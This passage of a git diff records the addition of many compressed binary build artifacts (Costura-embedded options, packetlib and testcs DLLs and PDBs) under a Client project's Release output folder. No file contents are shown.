b/Client/obj/Release/Costura/04EF452C48827A1D094B1864103454518553D69D.costura.options.pdb.compressed new file mode 100644 index 0000000..3a31b47 Binary files /dev/null and b/Client/obj/Release/Costura/04EF452C48827A1D094B1864103454518553D69D.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/09EA460E7C262F159562A1CA0F0D07A2E07C992B.costura.options.dll.compressed b/Client/obj/Release/Costura/09EA460E7C262F159562A1CA0F0D07A2E07C992B.costura.options.dll.compressed new file mode 100644 index 0000000..0576aa4 Binary files /dev/null and b/Client/obj/Release/Costura/09EA460E7C262F159562A1CA0F0D07A2E07C992B.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed b/Client/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed new file mode 100644 index 0000000..1b0e825 Binary files /dev/null and b/Client/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed b/Client/obj/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed new file mode 100644 index 0000000..feb89f6 Binary files /dev/null and b/Client/obj/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/0C4E3A6DCF4EE8615E9D2DB5E1C28306CE855800.costura.options.dll.compressed b/Client/obj/Release/Costura/0C4E3A6DCF4EE8615E9D2DB5E1C28306CE855800.costura.options.dll.compressed new file mode 100644 index 0000000..e58473a Binary files /dev/null and b/Client/obj/Release/Costura/0C4E3A6DCF4EE8615E9D2DB5E1C28306CE855800.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed b/Client/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed new file mode 100644 index 0000000..bbf7c79 Binary files /dev/null and b/Client/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed b/Client/obj/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed new file mode 100644 index 0000000..c23658f Binary files /dev/null and b/Client/obj/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed b/Client/obj/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed new file mode 100644 index 0000000..ddf83ef Binary files /dev/null and b/Client/obj/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/16B5520A7125A488D49E1E17FFEAC96691A07A64.costura.options.pdb.compressed b/Client/obj/Release/Costura/16B5520A7125A488D49E1E17FFEAC96691A07A64.costura.options.pdb.compressed new file mode 100644 index 0000000..db9174e Binary files /dev/null and b/Client/obj/Release/Costura/16B5520A7125A488D49E1E17FFEAC96691A07A64.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed b/Client/obj/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed new file mode 100644 index 0000000..98b1975 Binary files /dev/null and b/Client/obj/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/1F22AB9B939DC17CA516E617DA07227FF3D43BE5.costura.options.pdb.compressed b/Client/obj/Release/Costura/1F22AB9B939DC17CA516E617DA07227FF3D43BE5.costura.options.pdb.compressed new file mode 100644 index 0000000..572faaf Binary files /dev/null and b/Client/obj/Release/Costura/1F22AB9B939DC17CA516E617DA07227FF3D43BE5.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/21078D383FF167F5AFC5371BAA96CC3D3000B35E.costura.options.pdb.compressed b/Client/obj/Release/Costura/21078D383FF167F5AFC5371BAA96CC3D3000B35E.costura.options.pdb.compressed new file mode 100644 index 0000000..301565d Binary files /dev/null and b/Client/obj/Release/Costura/21078D383FF167F5AFC5371BAA96CC3D3000B35E.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed b/Client/obj/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed new file mode 100644 index 0000000..eae2512 Binary files /dev/null and b/Client/obj/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed b/Client/obj/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed new file mode 100644 index 0000000..8f07b84 Binary files /dev/null and b/Client/obj/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/254B6FEAEE223D39A1624730A1A15FDBD465F71D.costura.options.dll.compressed b/Client/obj/Release/Costura/254B6FEAEE223D39A1624730A1A15FDBD465F71D.costura.options.dll.compressed new file mode 100644 index 0000000..dc1c229 Binary files /dev/null and b/Client/obj/Release/Costura/254B6FEAEE223D39A1624730A1A15FDBD465F71D.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed b/Client/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed new file mode 100644 index 0000000..49c6d73 Binary files /dev/null and b/Client/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/27D2255A9D65FA0FB9E19EB02AEA679779C4C14F.costura.options.dll.compressed b/Client/obj/Release/Costura/27D2255A9D65FA0FB9E19EB02AEA679779C4C14F.costura.options.dll.compressed new file mode 100644 index 0000000..676dfec Binary files /dev/null and b/Client/obj/Release/Costura/27D2255A9D65FA0FB9E19EB02AEA679779C4C14F.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/2A0D06EE18B293CCC3DFD7B17EEED366AA2F628B.costura.options.dll.compressed b/Client/obj/Release/Costura/2A0D06EE18B293CCC3DFD7B17EEED366AA2F628B.costura.options.dll.compressed new file mode 100644 index 0000000..8acdb1c Binary files /dev/null and b/Client/obj/Release/Costura/2A0D06EE18B293CCC3DFD7B17EEED366AA2F628B.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/Client/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..951925a Binary files /dev/null and b/Client/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed b/Client/obj/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed new file mode 100644 index 0000000..3511f05 Binary files /dev/null and b/Client/obj/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed b/Client/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed new file mode 100644 index 0000000..fee461a Binary files /dev/null and b/Client/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/33BB51CB5227116C7F2081CCC4E88CEF65EFE4B2.costura.options.dll.compressed b/Client/obj/Release/Costura/33BB51CB5227116C7F2081CCC4E88CEF65EFE4B2.costura.options.dll.compressed new file mode 100644 index 0000000..1b30b2e Binary files /dev/null and b/Client/obj/Release/Costura/33BB51CB5227116C7F2081CCC4E88CEF65EFE4B2.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/346CCDD0EE03EABF1A56630BB7FBCDB3D2926229.costura.options.pdb.compressed b/Client/obj/Release/Costura/346CCDD0EE03EABF1A56630BB7FBCDB3D2926229.costura.options.pdb.compressed new file mode 100644 index 0000000..cfba44b Binary files /dev/null and b/Client/obj/Release/Costura/346CCDD0EE03EABF1A56630BB7FBCDB3D2926229.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed b/Client/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed new file mode 100644 index 0000000..286270e Binary files /dev/null and b/Client/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed b/Client/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed new file mode 100644 index 0000000..025632a Binary files /dev/null and b/Client/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed b/Client/obj/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed new file mode 100644 index 0000000..751d9ad Binary files /dev/null and b/Client/obj/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed new file mode 100644 index 0000000..bda82f6 Binary files /dev/null and b/Client/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..9790ff2 Binary files /dev/null and b/Client/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/Client/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/4DBFEA08FFF8C2D44C30D8347ACEB83D447CE458.costura.options.dll.compressed b/Client/obj/Release/Costura/4DBFEA08FFF8C2D44C30D8347ACEB83D447CE458.costura.options.dll.compressed new file mode 100644 index 0000000..e0615eb Binary files /dev/null and b/Client/obj/Release/Costura/4DBFEA08FFF8C2D44C30D8347ACEB83D447CE458.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/504590A7B82D18B4BBF55F7F8F081C906830442F.costura.options.pdb.compressed b/Client/obj/Release/Costura/504590A7B82D18B4BBF55F7F8F081C906830442F.costura.options.pdb.compressed new file mode 100644 index 0000000..1311abf Binary files /dev/null and b/Client/obj/Release/Costura/504590A7B82D18B4BBF55F7F8F081C906830442F.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed b/Client/obj/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed new file mode 100644 index 0000000..43b714f Binary files /dev/null and b/Client/obj/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed b/Client/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed new file mode 100644 index 0000000..f71113a Binary files /dev/null and b/Client/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed b/Client/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed new file mode 100644 index 0000000..d892f46 Binary files /dev/null and b/Client/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed b/Client/obj/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed new file mode 100644 index 0000000..1a682b2 Binary files /dev/null and b/Client/obj/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed b/Client/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed new file mode 100644 index 0000000..e7e9c7f Binary files /dev/null and b/Client/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/Client/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/Client/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/Client/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed b/Client/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed new file mode 100644 index 0000000..25eb9eb Binary files /dev/null and b/Client/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed b/Client/obj/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed new file mode 100644 index 0000000..8e4286f Binary files /dev/null and b/Client/obj/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/5CBD44B4E3E4E1B71C3E9B563A15B30C5A36A959.costura.options.pdb.compressed b/Client/obj/Release/Costura/5CBD44B4E3E4E1B71C3E9B563A15B30C5A36A959.costura.options.pdb.compressed new file mode 100644 index 0000000..3649546 Binary files /dev/null and b/Client/obj/Release/Costura/5CBD44B4E3E4E1B71C3E9B563A15B30C5A36A959.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed b/Client/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed new file mode 100644 index 0000000..36aabb7 Binary files /dev/null and b/Client/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed b/Client/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed new file mode 100644 index 0000000..488b3bd Binary files /dev/null and b/Client/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed b/Client/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed new file mode 100644 index 0000000..b67885e Binary files /dev/null and b/Client/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed b/Client/obj/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed new file mode 100644 index 0000000..f5e0970 Binary files /dev/null and b/Client/obj/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed b/Client/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed new file mode 100644 index 0000000..1fb37ac Binary files /dev/null and b/Client/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed b/Client/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed new file mode 100644 index 0000000..6a80e1d Binary files /dev/null and b/Client/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/6F9C14234449665C302BF0C50684F4B9CA50ECA4.costura.options.dll.compressed b/Client/obj/Release/Costura/6F9C14234449665C302BF0C50684F4B9CA50ECA4.costura.options.dll.compressed new file mode 100644 index 0000000..567fe8f Binary files /dev/null and b/Client/obj/Release/Costura/6F9C14234449665C302BF0C50684F4B9CA50ECA4.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/7247D05B9BA7EFCE53453AF3906583A9CBEA00AA.costura.testcs.dll.compressed b/Client/obj/Release/Costura/7247D05B9BA7EFCE53453AF3906583A9CBEA00AA.costura.testcs.dll.compressed new file mode 100644 index 0000000..615b737 Binary files /dev/null and b/Client/obj/Release/Costura/7247D05B9BA7EFCE53453AF3906583A9CBEA00AA.costura.testcs.dll.compressed differ diff --git a/Client/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/Client/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/Client/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/7845AC823C3F1FD571B4A02C2347823AFACEBCFB.costura.options.dll.compressed b/Client/obj/Release/Costura/7845AC823C3F1FD571B4A02C2347823AFACEBCFB.costura.options.dll.compressed new file mode 100644 index 0000000..c3e510c Binary files /dev/null and b/Client/obj/Release/Costura/7845AC823C3F1FD571B4A02C2347823AFACEBCFB.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed b/Client/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed new file mode 100644 index 0000000..3359e25 Binary files /dev/null and b/Client/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed b/Client/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed new file mode 100644 index 0000000..30f0f4d Binary files /dev/null and b/Client/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/7E5092EBEB71F36ED427EE4A36E9FA7EA90CE4D0.costura.options.dll.compressed b/Client/obj/Release/Costura/7E5092EBEB71F36ED427EE4A36E9FA7EA90CE4D0.costura.options.dll.compressed new file mode 100644 index 0000000..9fdca65 Binary files /dev/null and b/Client/obj/Release/Costura/7E5092EBEB71F36ED427EE4A36E9FA7EA90CE4D0.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/7FB35ED1C576A8D024B1FA843B9492426E2CE5B4.costura.options.pdb.compressed b/Client/obj/Release/Costura/7FB35ED1C576A8D024B1FA843B9492426E2CE5B4.costura.options.pdb.compressed new file mode 100644 index 0000000..2c8083c Binary files /dev/null and b/Client/obj/Release/Costura/7FB35ED1C576A8D024B1FA843B9492426E2CE5B4.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed b/Client/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed new file mode 100644 index 0000000..2adb729 Binary files /dev/null and b/Client/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..848516e Binary files /dev/null and b/Client/obj/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed b/Client/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed new file mode 100644 index 0000000..809e967 Binary files /dev/null and b/Client/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/88DF7F3C8277DC5BCCFCF199AD26D9692C0ADB64.costura.testcs.pdb.compressed b/Client/obj/Release/Costura/88DF7F3C8277DC5BCCFCF199AD26D9692C0ADB64.costura.testcs.pdb.compressed new file mode 100644 index 0000000..0e3131f Binary files /dev/null and b/Client/obj/Release/Costura/88DF7F3C8277DC5BCCFCF199AD26D9692C0ADB64.costura.testcs.pdb.compressed differ diff --git a/Client/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/Client/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/Client/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed b/Client/obj/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed new file mode 100644 index 0000000..b641b3b Binary files /dev/null and b/Client/obj/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed b/Client/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed new file mode 100644 index 0000000..e6a2588 Binary files /dev/null and b/Client/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/919654B334C9E1719DD6B45497C9113E4DC650B6.costura.options.pdb.compressed b/Client/obj/Release/Costura/919654B334C9E1719DD6B45497C9113E4DC650B6.costura.options.pdb.compressed new file mode 100644 index 0000000..fc7be62 Binary files /dev/null and b/Client/obj/Release/Costura/919654B334C9E1719DD6B45497C9113E4DC650B6.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/9521443229C580BED3DD0F5C07411F3BE88F4F70.costura.options.dll.compressed b/Client/obj/Release/Costura/9521443229C580BED3DD0F5C07411F3BE88F4F70.costura.options.dll.compressed new file mode 100644 index 0000000..684ffb7 Binary files /dev/null and b/Client/obj/Release/Costura/9521443229C580BED3DD0F5C07411F3BE88F4F70.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/96983BAD02FA82B657CE71415D8369C70FAC8549.costura.options.pdb.compressed b/Client/obj/Release/Costura/96983BAD02FA82B657CE71415D8369C70FAC8549.costura.options.pdb.compressed new file mode 100644 index 0000000..1b57aad Binary files /dev/null and b/Client/obj/Release/Costura/96983BAD02FA82B657CE71415D8369C70FAC8549.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/Client/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed b/Client/obj/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed new file mode 100644 index 0000000..726689b Binary files /dev/null and b/Client/obj/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 0000000..2c67faa Binary files /dev/null and b/Client/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed b/Client/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed new file mode 100644 index 0000000..56dfbdd Binary files /dev/null and b/Client/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed b/Client/obj/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed new file mode 100644 index 0000000..b0ac0eb Binary files /dev/null and b/Client/obj/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/Client/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/9EBEF8166B667777ACDDFD77F84A712102FC1C65.costura.options.pdb.compressed b/Client/obj/Release/Costura/9EBEF8166B667777ACDDFD77F84A712102FC1C65.costura.options.pdb.compressed new file mode 100644 index 0000000..87004fe Binary files /dev/null and b/Client/obj/Release/Costura/9EBEF8166B667777ACDDFD77F84A712102FC1C65.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/A05582867BB3F404D10079DC01AB52CA18915C4B.costura.options.dll.compressed b/Client/obj/Release/Costura/A05582867BB3F404D10079DC01AB52CA18915C4B.costura.options.dll.compressed new file mode 100644 index 0000000..b79f995 Binary files /dev/null and 